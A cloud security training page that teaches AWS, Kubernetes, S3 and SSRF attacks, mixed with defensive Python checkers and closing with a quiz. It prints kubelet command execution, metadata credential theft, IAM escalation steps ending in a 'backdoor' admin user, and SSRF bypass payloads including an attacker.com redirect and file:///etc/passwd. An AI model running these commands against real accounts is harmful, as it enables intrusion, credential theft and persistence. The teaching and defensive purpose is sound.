
Cloud Security & Hacking Lab

Master AWS, Azure, GCP & Kubernetes Security Testing


Cloud Security & Hacking Overview

Welcome to the Cloud Security & Hacking Lab, where you'll learn offensive security techniques for cloud environments including AWS, Azure, GCP, and Kubernetes.

What You'll Master:

  • Cloud Vulnerability Scanning: Identify security flaws in containers and cloud infrastructure
  • Kubernetes Security: Exploit misconfigurations in orchestration platforms
  • S3 Bucket Discovery: Find and exploit exposed AWS storage
  • AWS Enumeration: Discover accounts, IAM roles, and credentials
  • Privilege Escalation: Elevate permissions in cloud environments
  • SSRF Attacks: Exploit metadata services for credential theft

Learning Objectives:
By completing this lab, you will understand cloud attack surfaces, enumeration techniques, privilege escalation paths, and defensive countermeasures.

Ethical Notice:
The techniques demonstrated here are for educational purposes and authorized security testing only. Unauthorized access to cloud resources is illegal.

Cloud Security Shared Responsibility Model

Cloud Provider Responsibility: physical security, infrastructure, hypervisor, network isolation
Customer Responsibility: OS security, application security, data encryption, IAM, network configuration
Common Attack Surface: misconfigurations, exposed credentials, overprivileged IAM, public storage

Cloud Platforms

AWS (Amazon Web Services)

Market leader with EC2, S3, IAM, Lambda. Common targets: metadata service (169.254.169.254), exposed S3 buckets, IAM misconfigurations.

Azure (Microsoft Azure)

Enterprise-focused platform with VMs, Blob Storage, AAD. Targets: IMDS endpoint, storage account keys, managed identities.

GCP (Google Cloud Platform)

Developer-friendly with Compute Engine, Cloud Storage, IAM. Targets: metadata server, service account keys, storage buckets.

Kubernetes (K8s)

Container orchestration platform. Targets: etcd, API server, kubelet, exposed dashboards, RBAC misconfigurations.

Cloud Vulnerability Scanning

Identify security vulnerabilities in container images, cloud configurations, and infrastructure as code.

Container Image Scanning Tools

Trivy

By Aqua Security

Comprehensive vulnerability scanner for containers, file systems, and Git repositories. Detects CVEs, misconfigurations, and secrets.

trivy image nginx:latest
trivy fs --security-checks vuln,config .

Clair

By CoreOS/Red Hat

Static analysis of vulnerabilities in container images. Integrates with CI/CD pipelines for automated scanning.

clairctl analyze nginx:latest
clairctl report nginx:latest

Dagda

Open Source

Static analysis of known vulnerabilities, trojans, viruses, and malware in Docker images.

dagda vuln --docker_image nginx:latest

Twistlock

By Palo Alto Networks

Enterprise container security platform with runtime protection, compliance, and vulnerability management.

twistcli images scan nginx:latest

Sysdig

Commercial Platform

Container intelligence and security platform with runtime detection and forensics capabilities.

sysdig-cli-scanner nginx:latest

Best Practices:
  • Scan images before deployment in CI/CD pipelines
  • Use minimal base images (Alpine, Distroless) to reduce attack surface
  • Regularly update base images and dependencies
  • Implement image signing and verification
  • Monitor runtime behavior for anomalies

Kubernetes Security

Understand Kubernetes architecture and common attack vectors for penetration testing.

Kubernetes Architecture & Attack Surfaces

Master Node (Control Plane): API Server :6443, etcd :2379, Scheduler
Worker Node 1 (Workload Execution): Kubelet :10250, Container Runtime, kube-proxy
Worker Node 2 (Workload Execution): Kubelet :10250, Container Runtime, kube-proxy

Key Attack Vectors

1. etcd Enumeration (Port 2379)
Distributed key-value store containing cluster secrets, configurations, and state. If exposed without authentication, attackers can extract credentials and API tokens.
curl http://target:2379/v2/keys/?recursive=true
etcdctl get / --prefix --keys-only

2. API Server Exploitation (Port 6443/8080)
Unauthenticated or weakly authenticated API access allows cluster control. Check for anonymous access and RBAC misconfigurations.
kubectl --insecure-skip-tls-verify get pods
kubectl auth can-i --list

3. Kubelet API (Port 10250)
Node agent that can be exploited for command execution in containers, pod information disclosure, and node compromise.
curl -k https://target:10250/pods
curl -k https://target:10250/run/<namespace>/<pod>/<container> -d "cmd=id"

4. Configuration File Exploitation
Exposed kubeconfig files, service account tokens mounted in pods, and secrets stored insecurely.
cat /var/run/secrets/kubernetes.io/serviceaccount/token
kubectl --token=$TOKEN get secrets

Kubernetes Enumeration Checklist

Critical Misconfigurations:
  • Anonymous authentication enabled on API server
  • etcd exposed without TLS/authentication
  • Kubelet read-only port (10255) accessible
  • Overly permissive RBAC (cluster-admin to default service accounts)
  • Privileged containers with hostPath or hostNetwork
  • Dashboard exposed without authentication
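A checker for the misconfigurations in that list, written for this page as an added example (it is not lab code). It takes Pod and ClusterRoleBinding objects as plain dicts in the shape `kubectl get pod -o json` / `kubectl get clusterrolebinding -o json` return; the sample objects are constructed.

```python
DEFAULT_SERVICE_ACCOUNTS = {"default"}   # accounts that should never be granted extra rights


def check_pod(pod):
    """Return findings for one Pod dict (shape of `kubectl get pod -o json`)."""
    name = pod.get("metadata", {}).get("name", "<unnamed>")
    spec = pod.get("spec", {})
    findings = []
    if spec.get("hostNetwork"):
        findings.append(f"{name}: hostNetwork shares the node's network namespace")
    for vol in spec.get("volumes", []):
        if "hostPath" in vol:
            findings.append(f"{name}: hostPath volume exposes node path {vol['hostPath'].get('path')}")
    # The default is True, which is what puts a token under /var/run/secrets/kubernetes.io/serviceaccount
    if spec.get("automountServiceAccountToken", True):
        findings.append(f"{name}: service account token is auto-mounted")
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        sc = c.get("securityContext", {})
        if sc.get("privileged"):
            findings.append(f"{name}/{c['name']}: privileged container (node devices and capabilities)")
        if sc.get("allowPrivilegeEscalation", True):
            findings.append(f"{name}/{c['name']}: allowPrivilegeEscalation is not false")
    return findings


def check_cluster_role_binding(binding):
    """Flag cluster-admin bound to a default service account (shape of `kubectl get clusterrolebinding -o json`)."""
    name = binding.get("metadata", {}).get("name", "<unnamed>")
    if binding.get("roleRef", {}).get("name") != "cluster-admin":
        return []
    return [f"{name}: cluster-admin bound to ServiceAccount {s.get('namespace')}/{s['name']}"
            for s in binding.get("subjects", [])
            if s.get("kind") == "ServiceAccount" and s.get("name") in DEFAULT_SERVICE_ACCOUNTS]


# Constructed samples: a careless "debug" pod, a hardened pod, and an over-broad binding.
RISKY_POD = {
    "metadata": {"name": "debug-shell"},
    "spec": {
        "hostNetwork": True,
        "volumes": [{"name": "root", "hostPath": {"path": "/"}}],
        "containers": [{"name": "shell", "image": "busybox", "securityContext": {"privileged": True}}],
    },
}
HARDENED_POD = {
    "metadata": {"name": "web"},
    "spec": {
        "automountServiceAccountToken": False,
        "containers": [{"name": "app", "image": "nginx",
                        "securityContext": {"privileged": False, "allowPrivilegeEscalation": False}}],
    },
}
RISKY_BINDING = {
    "metadata": {"name": "lab-admin"},
    "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
    "subjects": [{"kind": "ServiceAccount", "name": "default", "namespace": "default"}],
}

if __name__ == "__main__":
    for finding in check_pod(RISKY_POD) + check_pod(HARDENED_POD) + check_cluster_role_binding(RISKY_BINDING):
        print("FINDING:", finding)
```

The same checks apply to the pod template inside a Deployment or DaemonSet; `automountServiceAccountToken` can also be set to false on the ServiceAccount object itself.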

S3 Bucket Discovery & Exploitation

Learn techniques to discover and exploit misconfigured AWS S3 buckets containing sensitive data.

S3 Bucket Discovery Methods

1. Source Code Analysis

Search application source code, JavaScript files, and mobile apps for hardcoded S3 bucket names and URLs.

grep -r "s3.amazonaws.com" .
grep -r ".s3." *.js

2. Brute Force Discovery

Use wordlists to generate common bucket names based on company names, domains, and common patterns.

s3scanner scan --buckets-file wordlist.txt
./BucketKicker.py wordlist.txt

3. Grayhat Warfare

Search engine for publicly exposed S3 buckets. Search by bucket name, file type, or keywords in content.

https://buckets.grayhatwarfare.com/
Search: company-name backup

4. S3 Inspector

Check bucket permissions, ACLs, and policies for misconfigurations allowing unauthorized access.

aws s3api get-bucket-acl --bucket target
aws s3api get-bucket-policy --bucket target


S3 Bucket Naming Patterns

Common patterns to test:
  • company-name, companyname, company_name
  • company-backups, company-logs, company-data
  • company-prod, company-dev, company-staging
  • company-assets, company-uploads, company-files
  • domain.com, www.domain.com, assets.domain.com

Permission Testing

READ (R): List bucket contents and download objects
aws s3 ls s3://bucket-name --no-sign-request

WRITE (W): Upload files to bucket (potential malware hosting)
aws s3 cp test.txt s3://bucket-name/ --no-sign-request

FULL_CONTROL (F): Modify ACLs, delete objects, complete bucket takeover
aws s3api put-bucket-acl --bucket name --acl public-read

Real-World S3 Breaches:
  • Capital One (2019): 100M+ records exposed via SSRF to metadata service
  • Uber (2016): 57M records from publicly accessible S3 bucket
  • Verizon (2017): 14M customer records in unsecured bucket
  • GoDaddy (2019): Multiple buckets with customer data publicly readable
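An added example, not from the lab, that reads the two `aws s3api` outputs from the S3 Inspector step and reports the R / W / F exposure from the Permission Testing section: ACL grants to the AllUsers or AuthenticatedUsers groups, and bucket-policy statements with a wildcard principal. The sample outputs are constructed.

```python
import json

# ACL grantee groups that make a bucket public, as they appear in `aws s3api get-bucket-acl` output.
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "anyone, unauthenticated",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "any AWS account",
}
# ACL permissions mapped onto the R / W / F classes above; READ_ACP and WRITE_ACP count as F
# because reading or rewriting the ACL is the first step of a takeover.
PERMISSION_CLASS = {"READ": "R", "WRITE": "W", "READ_ACP": "F", "WRITE_ACP": "F", "FULL_CONTROL": "F"}


def public_acl_grants(acl):
    """Return [(class, permission, who)] for each grant to a public group."""
    found = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            perm = grant["Permission"]
            found.append((PERMISSION_CLASS.get(perm, "?"), perm, PUBLIC_GROUPS[grantee["URI"]]))
    return found


def _principal_is_public(principal):
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        return "*" in (aws if isinstance(aws, list) else [aws])
    return False


def public_policy_statements(policy_output):
    """Return the Action list of every Allow statement with a wildcard principal.
    Input is `aws s3api get-bucket-policy` output; its Policy field is a JSON string."""
    statements = json.loads(policy_output["Policy"]).get("Statement", [])
    if not isinstance(statements, list):
        statements = [statements]
    found = []
    for stmt in statements:
        if stmt.get("Effect") == "Allow" and _principal_is_public(stmt.get("Principal")):
            actions = stmt.get("Action", [])
            found.append(actions if isinstance(actions, list) else [actions])
    return found


# Constructed outputs for a bucket that is world-readable by ACL, writable by any AWS account,
# and world-readable again through its policy. Fix: remove the grants and statement, then enable
# `aws s3api put-public-access-block` with all four settings true.
SAMPLE_ACL = {
    "Owner": {"ID": "OWNER-CANONICAL-ID-PLACEHOLDER"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "OWNER-CANONICAL-ID-PLACEHOLDER"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"}, "Permission": "READ"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"}, "Permission": "WRITE"},
    ],
}
SAMPLE_POLICY_OUTPUT = {"Policy": json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
                   "Resource": "arn:aws:s3:::example-bucket/*"}],
})}
```

A policy statement with a Condition block is still reported; review the condition by hand, since some (for example `aws:SecureTransport`) do not restrict who can read.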

AWS Enumeration

Discover AWS account information, IAM roles, credentials, and cloud infrastructure details.

AWS Account ID Discovery

GitHub Search

Search GitHub for hardcoded credentials, config files, and CloudFormation templates containing account IDs.

site:github.com "company-name" "aws_access_key_id"
site:github.com "company-name" "arn:aws:iam"

Error Messages

Trigger verbose error messages that leak account IDs through invalid ARN references.

aws sts assume-role --role-arn arn:aws:iam::ACCOUNT:role/test
aws s3api get-object --bucket name --key test

AMI Discovery

Public AMIs and snapshots contain owner account IDs in their metadata.

aws ec2 describe-images --owners self
aws ec2 describe-snapshots --owner-ids ACCOUNT

DNS & SSL Certs

CloudFront distributions and ALB DNS names can reveal account information.

dig cloudfront.net ANY
openssl s_client -connect target:443

IAM Role & Credential Discovery

1. Git Repository Mining
Search GitHub, GitLab, Bitbucket for exposed credentials, .env files, and AWS config files.
trufflehog git https://github.com/target/repo
git-secrets --scan

2. Social Engineering
Phishing attacks targeting developers with access to AWS Console or CLI credentials.

3. Password Reuse
Test leaked credentials from public breaches against AWS Console login.

4. SSRF to Metadata Service
Exploit SSRF vulnerabilities to access EC2 metadata service and steal IAM role credentials.
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/

EC2 Metadata Service Exploitation

The EC2 metadata service provides instance metadata and temporary IAM credentials. It's accessible from within EC2 instances at a link-local address.

IMDSv2 Protection:
AWS introduced IMDSv2 (Instance Metadata Service Version 2), which requires a session token obtained via a PUT request before any metadata can be read; because most SSRF primitives can only issue GET requests, this mitigates the attack. Always check both v1 and v2 availability.
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
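An added example (not lab code) for the defender's side of the IMDSv2 note: it reads `aws ec2 describe-instances` output and lists instances whose MetadataOptions still answer token-less IMDSv1 requests, then emits the `aws ec2 modify-instance-metadata-options` command that enforces v2. The describe output below is constructed, with placeholder instance IDs.

```python
def imds_findings(describe_output, max_hop_limit=1):
    """Map InstanceId -> problems for instances whose MetadataOptions (from `aws ec2 describe-instances`)
    still answer token-less IMDSv1 requests, or let the IMDSv2 token PUT response travel further
    than the instance itself."""
    findings = {}
    for reservation in describe_output.get("Reservations", []):
        for inst in reservation.get("Instances", []):
            opts = inst.get("MetadataOptions", {})
            if opts.get("HttpEndpoint", "enabled") == "disabled":
                continue                                   # no metadata service at all: nothing to reach
            problems = []
            if opts.get("HttpTokens", "optional") != "required":
                problems.append("HttpTokens=optional: IMDSv1 GET requests (no session token) still succeed")
            hops = opts.get("HttpPutResponseHopLimit", 1)
            if hops > max_hop_limit:
                problems.append(f"HttpPutResponseHopLimit={hops}: token response may cross a container or NAT hop")
            if problems:
                findings[inst["InstanceId"]] = problems
    return findings


def remediation_commands(findings):
    """One `aws ec2 modify-instance-metadata-options` call per flagged instance, enforcing IMDSv2."""
    return [f"aws ec2 modify-instance-metadata-options --instance-id {iid} "
            "--http-tokens required --http-endpoint enabled --http-put-response-hop-limit 1"
            for iid in sorted(findings)]


# Constructed describe-instances output with placeholder instance IDs.
SAMPLE_DESCRIBE_INSTANCES = {"Reservations": [{"Instances": [
    {"InstanceId": "i-0aaaa0000000000a1",
     "MetadataOptions": {"State": "applied", "HttpTokens": "optional", "HttpPutResponseHopLimit": 1, "HttpEndpoint": "enabled"}},
    {"InstanceId": "i-0bbbb0000000000b2",
     "MetadataOptions": {"State": "applied", "HttpTokens": "required", "HttpPutResponseHopLimit": 2, "HttpEndpoint": "enabled"}},
    {"InstanceId": "i-0cccc0000000000c3",
     "MetadataOptions": {"State": "applied", "HttpTokens": "required", "HttpPutResponseHopLimit": 1, "HttpEndpoint": "enabled"}},
    {"InstanceId": "i-0dddd0000000000d4",
     "MetadataOptions": {"State": "applied", "HttpTokens": "optional", "HttpPutResponseHopLimit": 1, "HttpEndpoint": "disabled"}},
]}]}

if __name__ == "__main__":
    for cmd in remediation_commands(imds_findings(SAMPLE_DESCRIBE_INSTANCES)):
        print(cmd)
```

Hosts that run containers which legitimately need IMDS may require a hop limit of 2; the setting that matters most is `--http-tokens required`.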


AWS Privilege Escalation

Techniques to elevate privileges from limited IAM permissions to administrator access.

Privilege Escalation Path Visualizer

Level 1: Initial Access (Low Privilege)

Permissions: ec2:DescribeInstances, s3:ListBucket (Read-only)

Goal: Enumerate environment and identify escalation vectors

aws sts get-caller-identity
aws iam get-user
aws iam list-attached-user-policies --user-name username

Level 2: EC2 Instance with Existing Profile

Required Permissions: iam:PassRole + ec2:RunInstances

Technique: Launch EC2 instance with privileged IAM role attached, then access metadata service to steal credentials.

aws ec2 run-instances \
--image-id ami-12345678 \
--instance-type t2.micro \
--iam-instance-profile Name=AdminRole

# SSH into instance and steal creds:
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/AdminRole

Level 3: Create New Policy Version

Required Permissions: iam:CreatePolicyVersion

Technique: Modify existing policy by creating new version with elevated permissions and setting it as default.

aws iam create-policy-version \
--policy-arn arn:aws:iam::ACCOUNT:policy/LimitedPolicy \
--policy-document file://admin-policy.json \
--set-as-default

# admin-policy.json:
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}]
}

Level 4: Add User to Admin Group

Required Permissions: iam:AddUserToGroup

Technique: Add current user to existing admin group to inherit administrative permissions.

aws iam list-groups
aws iam get-group --group-name Administrators

aws iam add-user-to-group \
--user-name compromised-user \
--group-name Administrators

# Verify new permissions:
aws iam list-attached-group-policies --group-name Administrators

Level 5: Full Administrator Access

Achieved Permissions: *:* (Full AWS account control)

Impact: Complete account takeover - can create users, access all data, launch resources, modify billing

# Verify admin access:
aws iam list-users
aws s3 ls
aws ec2 describe-instances --region us-east-1

# Create backdoor user:
aws iam create-user --user-name backdoor
aws iam attach-user-policy --user-name backdoor \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam create-access-key --user-name backdoor

Additional Privilege Escalation Vectors

iam:AttachUserPolicy

Attach administrator policy directly to user account.

aws iam attach-user-policy \
--user-name current-user \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess

iam:PutUserPolicy

Create inline policy with elevated permissions.

aws iam put-user-policy \
--user-name current-user \
--policy-name EscPolicy \
--policy-document file://admin.json

iam:UpdateAssumeRolePolicy

Modify role trust policy to allow assuming privileged role.

aws iam update-assume-role-policy \
--role-name AdminRole \
--policy-document file://trust.json

lambda:CreateFunction + iam:PassRole

Create Lambda with privileged role and execute code.

aws lambda create-function \
--function-name priv-esc \
--role arn:aws:iam::ACCOUNT:role/AdminRole \
--handler index.handler --zip-file fileb://func.zip

Defense Strategies:
  • Principle of Least Privilege: Grant minimum permissions required for job function
  • Permission Boundaries: Set maximum permissions for IAM entities
  • Service Control Policies (SCPs): Restrict dangerous actions at organization level
  • CloudTrail Monitoring: Alert on suspicious IAM modifications
  • Regular Audits: Use IAM Access Analyzer and AWS Config to detect overprivileged roles
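An added example (not part of the lab or of any tool listed on this page) that turns the escalation paths in this section into a policy audit: it reads an IAM policy document, expands wildcard Actions, and reports which of the listed paths the document grants. The sample policies, including a LimitedPolicy with one stray permission, are constructed.

```python
import fnmatch

# Each escalation path in this section and the permission set that enables it.
ESCALATION_PATHS = {
    "create new default policy version": {"iam:CreatePolicyVersion"},
    "add user to admin group": {"iam:AddUserToGroup"},
    "attach managed policy to user": {"iam:AttachUserPolicy"},
    "put inline user policy": {"iam:PutUserPolicy"},
    "update role trust policy": {"iam:UpdateAssumeRolePolicy"},
    "pass privileged role to EC2 instance": {"iam:PassRole", "ec2:RunInstances"},
    "pass privileged role to Lambda function": {"iam:PassRole", "lambda:CreateFunction"},
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def allowed_action_patterns(policy):
    """Lower-cased Action patterns from the Allow statements of one policy document.
    Resource and Condition are ignored (iam:PassRole scoped to one harmless role is still
    reported) and Deny statements are not subtracted: this is a triage list, not a proof."""
    patterns = set()
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if "NotAction" in stmt:              # Allow + NotAction grants everything not listed
            patterns.add("*")
            continue
        patterns.update(a.lower() for a in _as_list(stmt.get("Action", [])))
    return patterns


def action_granted(action, patterns):
    """IAM wildcards (* and ?) behave like shell globs, which fnmatch reproduces."""
    return any(fnmatch.fnmatchcase(action.lower(), p) for p in patterns)


def find_escalation_paths(policy):
    """Names of the paths whose whole permission set is granted by this document."""
    patterns = allowed_action_patterns(policy)
    return sorted(name for name, needed in ESCALATION_PATHS.items()
                  if all(action_granted(a, patterns) for a in needed))


# Constructed samples: the lab's LimitedPolicy with one stray permission, and admin-policy.json from above.
LIMITED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["ec2:DescribeInstances", "s3:ListBucket"], "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:CreatePolicyVersion",
         "Resource": "arn:aws:iam::ACCOUNT:policy/LimitedPolicy"},
    ],
}
ADMIN_POLICY = {"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]}

if __name__ == "__main__":
    for label, policy in (("LimitedPolicy", LIMITED_POLICY), ("admin-policy.json", ADMIN_POLICY)):
        print(f"{label}: {find_escalation_paths(policy) or 'no listed escalation path'}")
```

Feed it the `PolicyVersion.Document` from `aws iam get-policy-version` for managed policies, or the `PolicyDocument` from `aws iam get-user-policy` / `aws iam get-role-policy` for inline ones; a hit is where a permission boundary or SCP should cut the path.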

SSRF Attack Demonstration

Server-Side Request Forgery (SSRF) allows attackers to make requests from the vulnerable server, often to access internal resources like the EC2 metadata service.

SSRF Attack Chain

1. Identify SSRF Vulnerability
Find user input that triggers server-side HTTP requests (URL parameters, webhooks, image fetching, PDF generation, etc.)

2. Test Internal Network Access
Attempt to access internal IP ranges, localhost, and cloud metadata endpoints

3. Access Metadata Service
Query 169.254.169.254 to retrieve instance metadata and IAM credentials

4. Extract IAM Credentials
Steal temporary access keys from security-credentials endpoint

5. Use Credentials for AWS Access
Configure AWS CLI with stolen credentials and access cloud resources


SSRF Bypass Techniques

IP Encoding

Bypass blacklists using alternative IP representations.

http://169.254.169.254/ (standard)
http://2852039166/ (decimal)
http://0xa9.0xfe.0xa9.0xfe/ (hex)
http://0251.0376.0251.0376/ (octal)

DNS Rebinding

Use DNS that resolves to internal IP after initial validation.

http://metadata.nicob.net
http://169.254.169.254.nip.io

URL Redirects

Host external page that redirects to metadata service.

http://attacker.com/redirect.php
# Redirects to 169.254.169.254

Protocol Smuggling

Use alternative protocols or URL parsers.

file:///etc/passwd
gopher://169.254.169.254:80/...
dict://169.254.169.254:80/

SSRF Defense Mechanisms:
  • Whitelist Allowed Domains: Only permit requests to known safe destinations
  • Block Private IP Ranges: Deny RFC 1918, link-local (169.254.0.0/16), and localhost
  • Disable Redirects: Prevent HTTP redirects that bypass filters
  • Use IMDSv2: Require session tokens for metadata service access
  • Network Segmentation: Isolate web servers from sensitive internal resources
  • Egress Filtering: Control outbound connections from application servers
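A destination check implementing the defenses above, written as an added example for this page (it is not part of the lab or of any product). It rejects non-HTTP schemes, decodes the decimal, hex and octal IP spellings from the bypass list, resolves hostnames, and refuses anything in the private, loopback or link-local ranges; `resolve` is injectable so the check can be exercised without DNS.

```python
import ipaddress
import re
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}            # no file://, gopher://, dict://
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",      # RFC 1918
    "169.254.0.0/16",                                     # link-local, including 169.254.169.254
    "127.0.0.0/8", "0.0.0.0/8",                           # loopback and "this host"
    "::1/128", "fe80::/10", "fd00::/8", "::ffff:0:0/96",  # IPv6 loopback, link-local, ULA, v4-mapped
)]


def parse_ipv4_literal(host):
    """Decode every spelling inet_aton accepts (dotted decimal, hex 0xa9, octal 0251, 1-3 part
    shorthands, bare 32-bit integer); returns None if host is not an IPv4 literal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
            values.append(int(part, 16))
        elif re.fullmatch(r"0[0-7]*", part):
            values.append(int(part, 8))
        elif re.fullmatch(r"[1-9][0-9]*", part):
            values.append(int(part))
        else:
            return None
    *head, last = values                        # the last part fills all remaining bytes
    last_bits = 8 * (4 - len(head))
    if any(v > 255 for v in head) or last >= 1 << last_bits:
        return None
    packed = 0
    for v in head:
        packed = (packed << 8) | v
    return ipaddress.IPv4Address((packed << last_bits) | last)


def _dns_resolve(host):
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_safe_url(url, resolve=_dns_resolve):
    """Return (ok, reason). Apply to every hop of a redirect chain, not only the first URL."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    literal = parse_ipv4_literal(host)
    try:
        addrs = [literal] if literal is not None else [ipaddress.ip_address(host)]
    except ValueError:                                       # not a literal: resolve the name
        try:
            addrs = [ipaddress.ip_address(a) for a in resolve(host)]
        except (OSError, ValueError) as exc:                 # socket.gaierror is an OSError
            return False, f"cannot resolve {host!r}: {exc}"
    for addr in addrs:
        if any(addr in net for net in BLOCKED_NETWORKS):
            return False, f"{host!r} resolves to blocked address {addr}"
    return True, "ok"
```

Redirects must be disabled in the HTTP client and each hop re-validated, and the connection should be made to the address that was checked rather than resolved a second time, otherwise a DNS rebinding answer can change between validation and connect.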

Real-World SSRF Case: Capital One Breach (2019)

Attack Summary:

Attacker exploited SSRF in web application firewall (WAF) to access EC2 metadata service, stealing IAM credentials. Used credentials to access S3 buckets containing 100+ million customer records.

Attack Steps:
  1. Discovered SSRF in misconfigured WAF
  2. Accessed http://169.254.169.254/latest/meta-data/iam/security-credentials/
  3. Retrieved IAM role temporary credentials
  4. Used credentials to list S3 buckets
  5. Exfiltrated sensitive customer data from multiple buckets
Lessons Learned:
  • Implement strict SSRF protections on all user-controlled URLs
  • Use IMDSv2 to prevent simple SSRF attacks
  • Apply principle of least privilege to IAM roles
  • Monitor for unusual metadata service access patterns
  • Encrypt sensitive data at rest in S3

Cloud Security Testing Tools

Essential tools for AWS penetration testing and security assessment.

Offensive Security Tools

PACU

By Rhino Security Labs

AWS exploitation framework with 40+ modules for enumeration, privilege escalation, persistence, and data exfiltration.

git clone https://github.com/RhinoSecurityLabs/pacu
cd pacu && bash install.sh
python3 pacu.py

# Example usage:
run iam__enum_permissions
run iam__privesc_scan

Key Modules: iam__enum_users, ec2__enum, s3__bucket_finder, lambda__backdoor_function

CloudGOAT 2

By Rhino Security Labs

Vulnerable-by-design AWS environment for learning cloud security. Multiple scenarios covering IAM, EC2, Lambda, and more.

git clone https://github.com/RhinoSecurityLabs/cloudgoat
cd cloudgoat
pip3 install -r requirements.txt
python3 cloudgoat.py config profile
python3 cloudgoat.py create iam_privesc_by_rollback

Scenarios: IAM privilege escalation, Lambda privilege escalation, EC2 SSRF, CodeBuild secrets

AWS-Pwn

Collection of AWS Exploitation Tools

Suite of tools for AWS credential discovery, enumeration, and exploitation from compromised environments.

git clone https://github.com/dagrz/aws_pwn

# Enumerate IAM permissions:
python3 aws_pwn.py --enumerate

# Search for credentials:
python3 aws_pwn.py --find-creds

WeirdAAL

AWS Attack Library

Python library for interacting with AWS services for penetration testing and red team operations.

git clone https://github.com/carnal0wnage/weirdAAL
python3 weirdAAL.py -m recon_all -t target

Prowler

AWS Security Assessment

Security best practices assessment, auditing, and hardening tool following CIS benchmarks.

git clone https://github.com/prowler-cloud/prowler
cd prowler
./prowler -M csv html

# Specific checks:
./prowler -g cislevel2

ScoutSuite

Multi-Cloud Security Auditing

Automated security assessment for AWS, Azure, GCP with detailed HTML reports.

pip install scoutsuite
scout aws --profile target

# Multi-cloud scan:
scout all --profile aws_profile

S3Scanner

S3 Bucket Discovery & Enumeration

Fast tool to find open S3 buckets and dump contents.

pip install s3scanner
s3scanner scan --buckets-file buckets.txt
s3scanner dump --bucket target-bucket

BucketKicker

S3 Brute Force Tool

Dictionary-based S3 bucket discovery with permission testing.

git clone https://github.com/craighays/bucketkicker
python BucketKicker.py wordlist.txt

CloudMapper

AWS Environment Visualization

Creates network diagrams of AWS environments for security analysis.

git clone https://github.com/duo-labs/cloudmapper
python cloudmapper.py configure
python cloudmapper.py collect
python cloudmapper.py prepare
python cloudmapper.py webserver

enumerate-iam

IAM Permission Enumeration

Brute force AWS IAM permissions to understand what actions credentials can perform.

git clone https://github.com/andresriancho/enumerate-iam
python enumerate-iam.py --access-key AKIA... --secret-key ...

Terraform AWS Pwn

Vulnerable Infrastructure Templates

Intentionally vulnerable Terraform configurations for practicing cloud exploitation.

git clone https://github.com/SecurityFTW/terraform-aws-pwn
terraform init
terraform apply

Cloud_Enum

Multi-Cloud Asset Discovery

Enumerate public resources in AWS, Azure, and GCP.

git clone https://github.com/initstring/cloud_enum
python3 cloud_enum.py -k company-name

Tool Selection Guide:
  • Initial Reconnaissance: Prowler, ScoutSuite, Cloud_Enum
  • Credential Discovery: truffleHog, git-secrets, AWS-Pwn
  • Permission Enumeration: enumerate-iam, PACU, WeirdAAL
  • Privilege Escalation: PACU, CloudGOAT 2
  • S3 Bucket Hunting: S3Scanner, BucketKicker, Cloud_Enum
  • Learning & Practice: CloudGOAT 2, Terraform AWS Pwn

Cloud Security Quiz

Test your knowledge of cloud security and hacking techniques. Complete all questions to earn 80 XP!

Question 1: Which tool is specifically designed for AWS exploitation and includes 40+ attack modules?

Question 2: What is the IP address of the AWS EC2 metadata service?

Question 3: Which Kubernetes component stores all cluster secrets and configuration data?

Question 4: Which container scanning tool is developed by Aqua Security?

Question 5: What IAM permissions are required to escalate privileges by launching an EC2 instance with a privileged role?

Question 6: Which AWS feature requires a session token to mitigate SSRF attacks against the metadata service?

Question 7: What is the default port for the Kubernetes API server?

Question 8: Which tool can be used to brute force S3 bucket names?

Question 9: CloudGOAT 2 is used for:

Question 10: Which IAM permission allows an attacker to modify an existing policy by creating a new version?

Question 11: What type of attack was used in the Capital One breach to access the metadata service?

Question 12: In the Cloud Shared Responsibility Model, who is responsible for IAM configuration?